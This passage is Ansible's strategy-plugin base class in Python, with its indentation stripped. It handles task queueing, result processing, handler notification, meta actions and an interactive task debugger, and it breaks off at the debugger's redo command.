# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import cmd
import functools
import os
import pprint
import sys
import threading
import time
from collections import deque
from multiprocessing import Lock
from jinja2.exceptions import UndefinedError
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleParserError, AnsibleUndefinedVariable
from ansible.executor import action_write_locks
from ansible.executor.process.worker import WorkerProcess
from ansible.executor.task_result import TaskResult
from ansible.inventory.host import Host
from ansible.module_utils.six.moves import queue as Queue
from ansible.module_utils.six import iteritems, itervalues, string_types
from ansible.module_utils._text import to_text
from ansible.module_utils.connection import Connection, ConnectionError
from ansible.playbook.helpers import load_list_of_blocks
from ansible.playbook.included_file import IncludedFile
from ansible.playbook.task_include import TaskInclude
from ansible.playbook.role_include import IncludeRole
from ansible.plugins.loader import action_loader, connection_loader, filter_loader, lookup_loader, module_loader, test_loader
from ansible.template import Templar
from ansible.utils.vars import combine_vars
from ansible.vars.clean import strip_internal_keys
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['StrategyBase']
class StrategySentinel:
pass
# TODO: this should probably be in the plugins/__init__.py, with
# a smarter mechanism to set all of the attributes based on
# the loaders created there
class SharedPluginLoaderObj:
'''
A simple object to make pass the various plugin loaders to
the forked processes over the queue easier
'''
def __init__(self):
self.action_loader = action_loader
self.connection_loader = connection_loader
self.filter_loader = filter_loader
self.test_loader = test_loader
self.lookup_loader = lookup_loader
self.module_loader = module_loader
_sentinel = StrategySentinel()
def results_thread_main(strategy):
while True:
try:
result = strategy._final_q.get()
if isinstance(result, StrategySentinel):
break
else:
strategy._results_lock.acquire()
strategy._results.append(result)
strategy._results_lock.release()
except (IOError, EOFError):
break
except Queue.Empty:
pass
def debug_closure(func):
"""Closure to wrap ``StrategyBase._process_pending_results`` and invoke the task debugger"""
@functools.wraps(func)
def inner(self, iterator, one_pass=False, max_passes=None):
status_to_stats_map = (
('is_failed', 'failures'),
('is_unreachable', 'dark'),
('is_changed', 'changed'),
('is_skipped', 'skipped'),
)
# We don't know the host yet, copy the previous states, for lookup after we process new results
prev_host_states = iterator._host_states.copy()
results = func(self, iterator, one_pass=one_pass, max_passes=max_passes)
_processed_results = []
for result in results:
task = result._task
host = result._host
_queued_task_args = self._queued_task_cache.pop((host.name, task._uuid), None)
task_vars = _queued_task_args['task_vars']
play_context = _queued_task_args['play_context']
# Try to grab the previous host state, if it doesn't exist use get_host_state to generate an empty state
try:
prev_host_state = prev_host_states[host.name]
except KeyError:
prev_host_state = iterator.get_host_state(host)
while result.needs_debugger(globally_enabled=self.debugger_active):
next_action = NextAction()
dbg = Debugger(task, host, task_vars, play_context, result, next_action)
dbg.cmdloop()
if next_action.result == NextAction.REDO:
# rollback host state
self._tqm.clear_failed_hosts()
iterator._host_states[host.name] = prev_host_state
for method, what in status_to_stats_map:
if getattr(result, method)():
self._tqm._stats.decrement(what, host.name)
self._tqm._stats.decrement('ok', host.name)
# redo
self._queue_task(host, task, task_vars, play_context)
_processed_results.extend(debug_closure(func)(self, iterator, one_pass))
break
elif next_action.result == NextAction.CONTINUE:
_processed_results.append(result)
break
elif next_action.result == NextAction.EXIT:
# Matches KeyboardInterrupt from bin/ansible
sys.exit(99)
else:
_processed_results.append(result)
return _processed_results
return inner
class StrategyBase:
'''
This is the base class for strategy plugins, which contains some common
code useful to all strategies like running handlers, cleanup actions, etc.
'''
def __init__(self, tqm):
self._tqm = tqm
self._inventory = tqm.get_inventory()
self._workers = tqm.get_workers()
self._notified_handlers = tqm._notified_handlers
self._listening_handlers = tqm._listening_handlers
self._variable_manager = tqm.get_variable_manager()
self._loader = tqm.get_loader()
self._final_q = tqm._final_q
self._step = getattr(tqm._options, 'step', False)
self._diff = getattr(tqm._options, 'diff', False)
self.flush_cache = getattr(tqm._options, 'flush_cache', False)
# the task cache is a dictionary of tuples of (host.name, task._uuid)
# used to find the original task object of in-flight tasks and to store
# the task args/vars and play context info used to queue the task.
self._queued_task_cache = {}
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
# internal counters
self._pending_results = 0
self._cur_worker = 0
# this dictionary is used to keep track of hosts that have
# outstanding tasks still in queue
self._blocked_hosts = dict()
self._results = deque()
self._results_lock = threading.Condition(threading.Lock())
# create the result processing thread for reading results in the background
self._results_thread = threading.Thread(target=results_thread_main, args=(self,))
self._results_thread.daemon = True
self._results_thread.start()
# holds the list of active (persistent) connections to be shutdown at
# play completion
self._active_connections = dict()
self.debugger_active = C.ENABLE_TASK_DEBUGGER
def cleanup(self):
# close active persistent connections
for sock in itervalues(self._active_connections):
try:
conn = Connection(sock)
conn.reset()
except ConnectionError as e:
# most likely socket is already closed
display.debug("got an error while closing persistent connection: %s" % e)
self._final_q.put(_sentinel)
self._results_thread.join()
def run(self, iterator, play_context, result=0):
# execute one more pass through the iterator without peeking, to
# make sure that all of the hosts are advanced to their final task.
# This should be safe, as everything should be ITERATING_COMPLETE by
# this point, though the strategy may not advance the hosts itself.
[iterator.get_next_task_for_host(host) for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
# save the failed/unreachable hosts, as the run_handlers()
# method will clear that information during its execution
failed_hosts = iterator.get_failed_hosts()
unreachable_hosts = self._tqm._unreachable_hosts.keys()
display.debug("running handlers")
handler_result = self.run_handlers(iterator, play_context)
if isinstance(handler_result, bool) and not handler_result:
result |= self._tqm.RUN_ERROR
elif not handler_result:
result |= handler_result
# now update with the hosts (if any) that failed or were
# unreachable during the handler execution phase
failed_hosts = set(failed_hosts).union(iterator.get_failed_hosts())
unreachable_hosts = set(unreachable_hosts).union(self._tqm._unreachable_hosts.keys())
# return the appropriate code, depending on the status hosts after the run
if not isinstance(result, bool) and result != self._tqm.RUN_OK:
return result
elif len(unreachable_hosts) > 0:
return self._tqm.RUN_UNREACHABLE_HOSTS
elif len(failed_hosts) > 0:
return self._tqm.RUN_FAILED_HOSTS
else:
return self._tqm.RUN_OK
def get_hosts_remaining(self, play):
return [host for host in self._inventory.get_hosts(play.hosts)
if host.name not in self._tqm._failed_hosts and host.name not in self._tqm._unreachable_hosts]
def get_failed_hosts(self, play):
return [host for host in self._inventory.get_hosts(play.hosts) if host.name in self._tqm._failed_hosts]
def add_tqm_variables(self, vars, play):
'''
Base class method to add extra variables/information to the list of task
vars sent through the executor engine regarding the task queue manager state.
'''
vars['ansible_current_hosts'] = [h.name for h in self.get_hosts_remaining(play)]
vars['ansible_failed_hosts'] = [h.name for h in self.get_failed_hosts(play)]
def _queue_task(self, host, task, task_vars, play_context):
''' handles queueing the task up to be sent to a worker '''
display.debug("entering _queue_task() for %s/%s" % (host.name, task.action))
# Add a write lock for tasks.
# Maybe this should be added somewhere further up the call stack but
# this is the earliest in the code where we have task (1) extracted
# into its own variable and (2) there's only a single code path
# leading to the module being run. This is called by three
# functions: __init__.py::_do_handler_run(), linear.py::run(), and
# free.py::run() so we'd have to add to all three to do it there.
# The next common higher level is __init__.py::run() and that has
# tasks inside of play_iterator so we'd have to extract them to do it
# there.
if task.action not in action_write_locks.action_write_locks:
display.debug('Creating lock for %s' % task.action)
action_write_locks.action_write_locks[task.action] = Lock()
# and then queue the new task
try:
# create a dummy object with plugin loaders set as an easier
# way to share them with the forked processes
shared_loader_obj = SharedPluginLoaderObj()
queued = False
starting_worker = self._cur_worker
while True:
(worker_prc, rslt_q) = self._workers[self._cur_worker]
if worker_prc is None or not worker_prc.is_alive():
self._queued_task_cache[(host.name, task._uuid)] = {
'host': host,
'task': task,
'task_vars': task_vars,
'play_context': play_context
}
worker_prc = WorkerProcess(self._final_q, task_vars, host, task, play_context, self._loader, self._variable_manager, shared_loader_obj)
self._workers[self._cur_worker][0] = worker_prc
worker_prc.start()
display.debug("worker is %d (out of %d available)" % (self._cur_worker + 1, len(self._workers)))
queued = True
self._cur_worker += 1
if self._cur_worker >= len(self._workers):
self._cur_worker = 0
if queued:
break
elif self._cur_worker == starting_worker:
time.sleep(0.0001)
self._pending_results += 1
except (EOFError, IOError, AssertionError) as e:
# most likely an abort
display.debug("got an error while queuing: %s" % e)
return
display.debug("exiting _queue_task() for %s/%s" % (host.name, task.action))
def get_task_hosts(self, iterator, task_host, task):
if task.run_once:
host_list = [host for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
else:
host_list = [task_host]
return host_list
def get_delegated_hosts(self, result, task):
host_name = result.get('_ansible_delegated_vars', {}).get('ansible_delegated_host', None)
if host_name is not None:
actual_host = self._inventory.get_host(host_name)
if actual_host is None:
actual_host = Host(name=host_name)
else:
actual_host = Host(name=task.delegate_to)
return [actual_host]
@debug_closure
def _process_pending_results(self, iterator, one_pass=False, max_passes=None):
'''
Reads results off the final queue and takes appropriate action
based on the result (executing callbacks, updating state, etc.).
'''
ret_results = []
def get_original_host(host_name):
# FIXME: this should not need x2 _inventory
host_name = to_text(host_name)
if host_name in self._inventory.hosts:
return self._inventory.hosts[host_name]
else:
return self._inventory.get_host(host_name)
def search_handler_blocks_by_name(handler_name, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_task.name:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler_task)
templar = Templar(loader=self._loader, variables=handler_vars)
try:
# first we check with the full result of get_name(), which may
# include the role name (if the handler is from a role). If that
# is not found, we resort to the simple name field, which doesn't
# have anything extra added to it.
target_handler_name = templar.template(handler_task.name)
if target_handler_name == handler_name:
return handler_task
else:
target_handler_name = templar.template(handler_task.get_name())
if target_handler_name == handler_name:
return handler_task
except (UndefinedError, AnsibleUndefinedVariable):
# We skip this handler due to the fact that it may be using
# a variable in the name that was conditionally included via
# set_fact or some other method, and we don't want to error
# out unnecessarily
continue
return None
def search_handler_blocks_by_uuid(handler_uuid, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_uuid == handler_task._uuid:
return handler_task
return None
def parent_handler_match(target_handler, handler_name):
if target_handler:
if isinstance(target_handler, (TaskInclude, IncludeRole)):
try:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=target_handler)
templar = Templar(loader=self._loader, variables=handler_vars)
target_handler_name = templar.template(target_handler.name)
if target_handler_name == handler_name:
return True
else:
target_handler_name = templar.template(target_handler.get_name())
if target_handler_name == handler_name:
return True
except (UndefinedError, AnsibleUndefinedVariable):
pass
return parent_handler_match(target_handler._parent, handler_name)
else:
return False
cur_pass = 0
while True:
try:
self._results_lock.acquire()
task_result = self._results.popleft()
except IndexError:
break
finally:
self._results_lock.release()
# get the original host and task. We then assign them to the TaskResult for use in callbacks/etc.
original_host = get_original_host(task_result._host)
queue_cache_entry = (original_host.name, task_result._task)
found_task = self._queued_task_cache.get(queue_cache_entry)['task']
original_task = found_task.copy(exclude_parent=True, exclude_tasks=True)
original_task._parent = found_task._parent
original_task.from_attrs(task_result._task_fields)
task_result._host = original_host
task_result._task = original_task
# send callbacks for 'non final' results
if '_ansible_retry' in task_result._result:
self._tqm.send_callback('v2_runner_retry', task_result)
continue
elif '_ansible_item_result' in task_result._result:
if task_result.is_failed() or task_result.is_unreachable():
self._tqm.send_callback('v2_runner_item_on_failed', task_result)
elif task_result.is_skipped():
self._tqm.send_callback('v2_runner_item_on_skipped', task_result)
else:
if 'diff' in task_result._result:
if self._diff or getattr(original_task, 'diff', False):
self._tqm.send_callback('v2_on_file_diff', task_result)
self._tqm.send_callback('v2_runner_item_on_ok', task_result)
continue
if original_task.register:
host_list = self.get_task_hosts(iterator, original_host, original_task)
clean_copy = strip_internal_keys(task_result._result)
if 'invocation' in clean_copy:
del clean_copy['invocation']
for target_host in host_list:
self._variable_manager.set_nonpersistent_facts(target_host, {original_task.register: clean_copy})
# all host status messages contain 2 entries: (msg, task_result)
role_ran = False
if task_result.is_failed():
role_ran = True
ignore_errors = original_task.ignore_errors
if not ignore_errors:
display.debug("marking %s as failed" % original_host.name)
if original_task.run_once:
# if we're using run_once, we have to fail every host here
for h in self._inventory.get_hosts(iterator._play.hosts):
if h.name not in self._tqm._unreachable_hosts:
state, _ = iterator.get_next_task_for_host(h, peek=True)
iterator.mark_host_failed(h)
state, new_task = iterator.get_next_task_for_host(h, peek=True)
else:
iterator.mark_host_failed(original_host)
# increment the failed count for this host
self._tqm._stats.increment('failures', original_host.name)
# grab the current state and if we're iterating on the rescue portion
# of a block then we save the failed task in a special var for use
# within the rescue/always
state, _ = iterator.get_next_task_for_host(original_host, peek=True)
if iterator.is_failed(original_host) and state and state.run_state == iterator.ITERATING_COMPLETE:
self._tqm._failed_hosts[original_host.name] = True
if state and iterator.get_active_state(state).run_state == iterator.ITERATING_RESCUE:
self._variable_manager.set_nonpersistent_facts(
original_host,
dict(
ansible_failed_task=original_task.serialize(),
ansible_failed_result=task_result._result,
),
)
else:
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
self._tqm.send_callback('v2_runner_on_failed', task_result, ignore_errors=ignore_errors)
elif task_result.is_unreachable():
self._tqm._unreachable_hosts[original_host.name] = True
iterator._play._removed_hosts.append(original_host.name)
self._tqm._stats.increment('dark', original_host.name)
self._tqm.send_callback('v2_runner_on_unreachable', task_result)
elif task_result.is_skipped():
self._tqm._stats.increment('skipped', original_host.name)
self._tqm.send_callback('v2_runner_on_skipped', task_result)
else:
role_ran = True
if original_task.loop:
# this task had a loop, and has more than one result, so
# loop over all of them instead of a single result
result_items = task_result._result.get('results', [])
else:
result_items = [task_result._result]
for result_item in result_items:
if '_ansible_notify' in result_item:
if task_result.is_changed():
# The shared dictionary for notified handlers is a proxy, which
# does not detect when sub-objects within the proxy are modified.
# So, per the docs, we reassign the list so the proxy picks up and
# notifies all other threads
for handler_name in result_item['_ansible_notify']:
found = False
# Find the handler using the above helper. First we look up the
# dependency chain of the current task (if it's from a role), otherwise
# we just look through the list of handlers in the current play/all
# roles and use the first one that matches the notify name
target_handler = search_handler_blocks_by_name(handler_name, iterator._play.handlers)
if target_handler is not None:
found = True
if target_handler._uuid not in self._notified_handlers:
self._notified_handlers[target_handler._uuid] = []
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', target_handler, original_host)
else:
# As there may be more than one handler with the notified name as the
# parent, so we just keep track of whether or not we found one at all
for target_handler_uuid in self._notified_handlers:
target_handler = search_handler_blocks_by_uuid(target_handler_uuid, iterator._play.handlers)
if target_handler and parent_handler_match(target_handler, handler_name):
found = True
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', target_handler, original_host)
if handler_name in self._listening_handlers:
for listening_handler_uuid in self._listening_handlers[handler_name]:
listening_handler = search_handler_blocks_by_uuid(listening_handler_uuid, iterator._play.handlers)
if listening_handler is not None:
found = True
else:
continue
if original_host not in self._notified_handlers[listening_handler._uuid]:
self._notified_handlers[listening_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', listening_handler, original_host)
# and if none were found, then we raise an error
if not found:
msg = ("The requested handler '%s' was not found in either the main handlers list nor in the listening "
"handlers list" % handler_name)
if C.ERROR_ON_MISSING_HANDLER:
raise AnsibleError(msg)
else:
display.warning(msg)
if 'add_host' in result_item:
# this task added a new host (add_host module)
new_host_info = result_item.get('add_host', dict())
self._add_host(new_host_info, iterator)
elif 'add_group' in result_item:
# this task added a new group (group_by module)
self._add_group(original_host, result_item)
if 'ansible_facts' in result_item:
# if delegated fact and we are delegating facts, we need to change target host for them
if original_task.delegate_to is not None and original_task.delegate_facts:
host_list = self.get_delegated_hosts(result_item, original_task)
else:
host_list = self.get_task_hosts(iterator, original_host, original_task)
if original_task.action == 'include_vars':
for (var_name, var_value) in iteritems(result_item['ansible_facts']):
# find the host we're actually referring too here, which may
# be a host that is not really in inventory at all
for target_host in host_list:
self._variable_manager.set_host_variable(target_host, var_name, var_value)
else:
cacheable = result_item.pop('_ansible_facts_cacheable', False)
for target_host in host_list:
if not original_task.action == 'set_fact' or cacheable:
self._variable_manager.set_host_facts(target_host, result_item['ansible_facts'].copy())
if original_task.action == 'set_fact':
self._variable_manager.set_nonpersistent_facts(target_host, result_item['ansible_facts'].copy())
if 'ansible_stats' in result_item and 'data' in result_item['ansible_stats'] and result_item['ansible_stats']['data']:
if 'per_host' not in result_item['ansible_stats'] or result_item['ansible_stats']['per_host']:
host_list = self.get_task_hosts(iterator, original_host, original_task)
else:
host_list = [None]
data = result_item['ansible_stats']['data']
aggregate = 'aggregate' in result_item['ansible_stats'] and result_item['ansible_stats']['aggregate']
for myhost in host_list:
for k in data.keys():
if aggregate:
self._tqm._stats.update_custom_stats(k, data[k], myhost)
else:
self._tqm._stats.set_custom_stats(k, data[k], myhost)
if 'diff' in task_result._result:
if self._diff or getattr(original_task, 'diff', False):
self._tqm.send_callback('v2_on_file_diff', task_result)
if not isinstance(original_task, TaskInclude):
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
# finally, send the ok for this task
self._tqm.send_callback('v2_runner_on_ok', task_result)
self._pending_results -= 1
if original_host.name in self._blocked_hosts:
del self._blocked_hosts[original_host.name]
# If this is a role task, mark the parent role as being run (if
# the task was ok or failed, but not skipped or unreachable)
if original_task._role is not None and role_ran: # TODO: and original_task.action != 'include_role':?
# lookup the role in the ROLE_CACHE to make sure we're dealing
# with the correct object and mark it as executed
for (entry, role_obj) in iteritems(iterator._play.ROLE_CACHE[original_task._role._role_name]):
if role_obj._uuid == original_task._role._uuid:
role_obj._had_task_run[original_host.name] = True
ret_results.append(task_result)
if one_pass or max_passes is not None and (cur_pass + 1) >= max_passes:
break
cur_pass += 1
return ret_results
def _wait_on_pending_results(self, iterator):
'''
Wait for the shared counter to drop to zero, using a short sleep
between checks to ensure we don't spin lock
'''
ret_results = []
display.debug("waiting for pending results...")
while self._pending_results > 0 and not self._tqm._terminated:
if self._tqm.has_dead_workers():
raise AnsibleError("A worker was found in a dead state")
results = self._process_pending_results(iterator)
ret_results.extend(results)
if self._pending_results > 0:
time.sleep(C.DEFAULT_INTERNAL_POLL_INTERVAL)
display.debug("no more pending results, returning what we have")
return ret_results
def _add_host(self, host_info, iterator):
'''
Helper function to add a new host to inventory based on a task result.
'''
if host_info:
host_name = host_info.get('host_name')
# Check if host in inventory, add if not
if host_name not in self._inventory.hosts:
self._inventory.add_host(host_name, 'all')
new_host = self._inventory.hosts.get(host_name)
# Set/update the vars for this host
new_host.vars = combine_vars(new_host.get_vars(), host_info.get('host_vars', dict()))
new_groups = host_info.get('groups', [])
for group_name in new_groups:
if group_name not in self._inventory.groups:
self._inventory.add_group(group_name)
new_group = self._inventory.groups[group_name]
new_group.add_host(self._inventory.hosts[host_name])
# reconcile inventory, ensures inventory rules are followed
self._inventory.reconcile_inventory()
def _add_group(self, host, result_item):
'''
Helper function to add a group (if it does not exist), and to assign the
specified host to that group.
'''
changed = False
# the host here is from the executor side, which means it was a
# serialized/cloned copy and we'll need to look up the proper
# host object from the master inventory
real_host = self._inventory.hosts.get(host.name)
if real_host is None:
if host.name == self._inventory.localhost.name:
real_host = self._inventory.localhost
else:
raise AnsibleError('%s cannot be matched in inventory' % host.name)
group_name = result_item.get('add_group')
parent_group_names = result_item.get('parent_groups', [])
for name in [group_name] + parent_group_names:
if name not in self._inventory.groups:
# create the new group and add it to inventory
self._inventory.add_group(name)
changed = True
group = self._inventory.groups[group_name]
for parent_group_name in parent_group_names:
parent_group = self._inventory.groups[parent_group_name]
parent_group.add_child_group(group)
if real_host.name not in group.get_hosts():
group.add_host(real_host)
changed = True
if group_name not in host.get_groups():
real_host.add_group(group)
changed = True
if changed:
self._inventory.reconcile_inventory()
return changed
def _copy_included_file(self, included_file):
'''
A proven safe and performant way to create a copy of an included file
'''
ti_copy = included_file._task.copy(exclude_parent=True)
ti_copy._parent = included_file._task._parent
temp_vars = ti_copy.vars.copy()
temp_vars.update(included_file._args)
ti_copy.vars = temp_vars
return ti_copy
def _load_included_file(self, included_file, iterator, is_handler=False):
'''
Loads an included YAML file of tasks, applying the optional set of variables.
'''
display.debug("loading included file: %s" % included_file._filename)
try:
data = self._loader.load_from_file(included_file._filename)
if data is None:
return []
elif not isinstance(data, list):
raise AnsibleError("included task files must contain a list of tasks")
ti_copy = self._copy_included_file(included_file)
# pop tags out of the include args, if they were specified there, and assign
# them to the include. If the include already had tags specified, we raise an
# error so that users know not to specify them both ways
tags = included_file._task.vars.pop('tags', [])
if isinstance(tags, string_types):
tags = tags.split(',')
if len(tags) > 0:
if len(included_file._task.tags) > 0:
raise AnsibleParserError("Include tasks should not specify tags in more than one way (both via args and directly on the task). "
"Mixing tag specify styles is prohibited for whole import hierarchy, not only for single import statement",
obj=included_file._task._ds)
display.deprecated("You should not specify tags in the include parameters. All tags should be specified using the task-level option")
included_file._task.tags = tags
block_list = load_list_of_blocks(
data,
play=iterator._play,
parent_block=None,
task_include=ti_copy,
role=included_file._task._role,
use_handlers=is_handler,
loader=self._loader,
variable_manager=self._variable_manager,
)
# since we skip incrementing the stats when the task result is
# first processed, we do so now for each host in the list
for host in included_file._hosts:
self._tqm._stats.increment('ok', host.name)
except AnsibleError as e:
# mark all of the hosts including this file as failed, send callbacks,
# and increment the stats for this host
for host in included_file._hosts:
tr = TaskResult(host=host, task=included_file._task, return_data=dict(failed=True, reason=to_text(e)))
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
self._tqm._stats.increment('failures', host.name)
self._tqm.send_callback('v2_runner_on_failed', tr)
return []
# finally, send the callback and return the list of blocks loaded
self._tqm.send_callback('v2_playbook_on_include', included_file)
display.debug("done processing included file")
return block_list
def run_handlers(self, iterator, play_context):
'''
Runs handlers on those hosts which have been notified.
'''
result = self._tqm.RUN_OK
for handler_block in iterator._play.handlers:
# FIXME: handlers need to support the rescue/always portions of blocks too,
# but this may take some work in the iterator and gets tricky when
# we consider the ability of meta tasks to flush handlers
for handler in handler_block.block:
if handler._uuid in self._notified_handlers and len(self._notified_handlers[handler._uuid]):
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler)
templar = Templar(loader=self._loader, variables=handler_vars)
handler_name = handler.get_name()
try:
handler_name = templar.template(handler_name)
except (UndefinedError, AnsibleUndefinedVariable):
pass
result = self._do_handler_run(handler, handler_name, iterator=iterator, play_context=play_context)
if not result:
break
return result
def _do_handler_run(self, handler, handler_name, iterator, play_context, notified_hosts=None):
# FIXME: need to use iterator.get_failed_hosts() instead?
# if not len(self.get_hosts_remaining(iterator._play)):
# self._tqm.send_callback('v2_playbook_on_no_hosts_remaining')
# result = False
# break
saved_name = handler.name
handler.name = handler_name
self._tqm.send_callback('v2_playbook_on_handler_task_start', handler)
handler.name = saved_name
if notified_hosts is None:
notified_hosts = self._notified_handlers[handler._uuid]
run_once = False
try:
action = action_loader.get(handler.action, class_only=True)
if handler.run_once or getattr(action, 'BYPASS_HOST_LOOP', False):
run_once = True
except KeyError:
# we don't care here, because the action may simply not have a
# corresponding action plugin
pass
host_results = []
for host in notified_hosts:
if not handler.has_triggered(host) and (not iterator.is_failed(host) or play_context.force_handlers):
task_vars = self._variable_manager.get_vars(play=iterator._play, host=host, task=handler)
self.add_tqm_variables(task_vars, play=iterator._play)
self._queue_task(host, handler, task_vars, play_context)
if run_once:
break
# collect the results from the handler run
host_results = self._wait_on_pending_results(iterator)
try:
included_files = IncludedFile.process_include_results(
host_results,
iterator=iterator,
loader=self._loader,
variable_manager=self._variable_manager
)
except AnsibleError as e:
return False
result = True
if len(included_files) > 0:
for included_file in included_files:
try:
new_blocks = self._load_included_file(included_file, iterator=iterator, is_handler=True)
# for every task in each block brought in by the include, add the list
# of hosts which included the file to the notified_handlers dict
for block in new_blocks:
iterator._play.handlers.append(block)
iterator.cache_block_tasks(block)
for task in block.block:
result = self._do_handler_run(
handler=task,
handler_name=task.get_name(),
iterator=iterator,
play_context=play_context,
notified_hosts=included_file._hosts[:],
)
if not result:
break
except AnsibleError as e:
for host in included_file._hosts:
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
display.warning(str(e))
continue
# wipe the notification list
self._notified_handlers[handler._uuid] = []
display.debug("done running handlers, result is: %s" % result)
return result
def _take_step(self, task, host=None):
ret = False
msg = u'Perform task: %s ' % task
if host:
msg += u'on %s ' % host
msg += u'(N)o/(y)es/(c)ontinue: '
resp = display.prompt(msg)
if resp.lower() in ['y', 'yes']:
display.debug("User ran task")
ret = True
elif resp.lower() in ['c', 'continue']:
display.debug("User ran task and canceled step mode")
self._step = False
ret = True
else:
display.debug("User skipped task")
display.banner(msg)
return ret
def _cond_not_supported_warn(self, task_name):
display.warning("%s task does not support when conditional" % task_name)
def _execute_meta(self, task, play_context, iterator, target_host):
# meta tasks store their args in the _raw_params field of args,
# since they do not use k=v pairs, so get that
meta_action = task.args.get('_raw_params')
def _evaluate_conditional(h):
all_vars = self._variable_manager.get_vars(play=iterator._play, host=h, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
return task.evaluate_conditional(templar, all_vars)
skipped = False
msg = ''
if meta_action == 'noop':
# FIXME: issue a callback for the noop here?
if task.when:
self._cond_not_supported_warn(meta_action)
msg = "noop"
elif meta_action == 'flush_handlers':
if task.when:
self._cond_not_supported_warn(meta_action)
self.run_handlers(iterator, play_context)
msg = "ran handlers"
elif meta_action == 'refresh_inventory' or self.flush_cache:
if task.when:
self._cond_not_supported_warn(meta_action)
self._inventory.refresh_inventory()
msg = "inventory successfully refreshed"
elif meta_action == 'clear_facts':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
hostname = host.get_name()
self._variable_manager.clear_facts(hostname)
msg = "facts cleared"
else:
skipped = True
elif meta_action == 'clear_host_errors':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
self._tqm._failed_hosts.pop(host.name, False)
self._tqm._unreachable_hosts.pop(host.name, False)
iterator._host_states[host.name].fail_state = iterator.FAILED_NONE
msg = "cleared host errors"
else:
skipped = True
elif meta_action == 'end_play':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
if host.name not in self._tqm._unreachable_hosts:
iterator._host_states[host.name].run_state = iterator.ITERATING_COMPLETE
msg = "ending play"
elif meta_action == 'reset_connection':
all_vars = self._variable_manager.get_vars(play=iterator._play, host=target_host, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
# apply the given task's information to the connection info,
# which may override some fields already set by the play or
# the options specified on the command line
play_context = play_context.set_task_and_variable_override(task=task, variables=all_vars, templar=templar)
# fields set from the play/task may be based on variables, so we have to
# do the same kind of post validation step on it here before we use it.
play_context.post_validate(templar=templar)
# now that the play context is finalized, if the remote_addr is not set
# default to using the host's address field as the remote address
if not play_context.remote_addr:
play_context.remote_addr = target_host.address
# We also add "magic" variables back into the variables dict to make sure
# a certain subset of variables exist.
play_context.update_vars(all_vars)
if task.when:
self._cond_not_supported_warn(meta_action)
if target_host in self._active_connections:
connection = Connection(self._active_connections[target_host])
del self._active_connections[target_host]
else:
connection = connection_loader.get(play_context.connection, play_context, os.devnull)
play_context.set_options_from_plugin(connection)
if connection:
try:
connection.reset()
msg = 'reset connection'
except ConnectionError as e:
# most likely socket is already closed
display.debug("got an error while closing persistent connection: %s" % e)
else:
msg = 'no connection, nothing to reset'
else:
raise AnsibleError("invalid meta action requested: %s" % meta_action, obj=task._ds)
result = {'msg': msg}
if skipped:
result['skipped'] = True
else:
result['changed'] = False
display.vv("META: %s" % msg)
return [TaskResult(target_host, task, result)]
def get_hosts_left(self, iterator):
''' returns list of available hosts for this iterator by filtering out unreachables '''
hosts_left = []
for host in self._inventory.get_hosts(iterator._play.hosts, order=iterator._play.order):
if host.name not in self._tqm._unreachable_hosts:
hosts_left.append(host)
return hosts_left
def update_active_connections(self, results):
''' updates the current active persistent connections '''
for r in results:
if 'args' in r._task_fields:
socket_path = r._task_fields['args'].get('_ansible_socket')
if socket_path:
if r._host not in self._active_connections:
self._active_connections[r._host] = socket_path
class NextAction(object):
""" The next action after an interpreter's exit. """
REDO = 1
CONTINUE = 2
EXIT = 3
def __init__(self, result=EXIT):
self.result = result
class Debugger(cmd.Cmd):
prompt_continuous = '> ' # multiple lines
def __init__(self, task, host, task_vars, play_context, result, next_action):
# cmd.Cmd is old-style class
cmd.Cmd.__init__(self)
self.prompt = '[%s] %s (debug)> ' % (host, task)
self.intro = None
self.scope = {}
self.scope['task'] = task
self.scope['task_vars'] = task_vars
self.scope['host'] = host
self.scope['play_context'] = play_context
self.scope['result'] = result
self.next_action = next_action
def cmdloop(self):
try:
cmd.Cmd.cmdloop(self)
except KeyboardInterrupt:
pass
do_h = cmd.Cmd.do_help
def do_EOF(self, args):
"""Quit"""
return self.do_quit(args)
def do_quit(self, args):
"""Quit"""
display.display('User interrupted execution')
self.next_action.result = NextAction.EXIT
return True
do_q = do_quit
def do_continue(self, args):
"""Continue to next result"""
self.next_action.result = NextAction.CONTINUE
return True
do_c = do_continue
def do_redo(self, args):
